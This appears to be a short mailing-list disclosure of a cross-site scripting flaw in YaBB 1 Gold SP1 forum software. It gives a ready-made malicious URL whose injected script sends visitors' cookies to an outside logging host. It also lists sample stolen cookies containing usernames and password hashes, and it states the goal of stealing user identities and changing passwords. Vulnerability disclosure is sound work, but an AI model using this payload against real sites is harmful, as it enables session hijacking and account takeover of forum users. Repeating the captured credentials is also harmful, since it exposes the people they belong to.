http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269<Script>location%3d'Http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script> num is a post that doesn't exist board must be a valid and accessable board X.php script to log the cookie that in an example of the cookie 268: YaBBusername=HellMind; YaBBpassword=yyG8B.3TA6i6I 272: YaBBusername=Canallaman; YaBBpassword=yypZn/JbGHTNY Tested in YaBB 1 Gold - SP1! i discover this now, i know isnt much but u can do steal the user identity and maybe u can try to change the password too (there is another old vuln but i dont know if work here) Sorry for my bad english Bye _________________________________________________________ Do You Yahoo!? Información de Estados Unidos y América Latina, en Yahoo! Noticias. Visítanos en http://noticias.espanol.yahoo.com
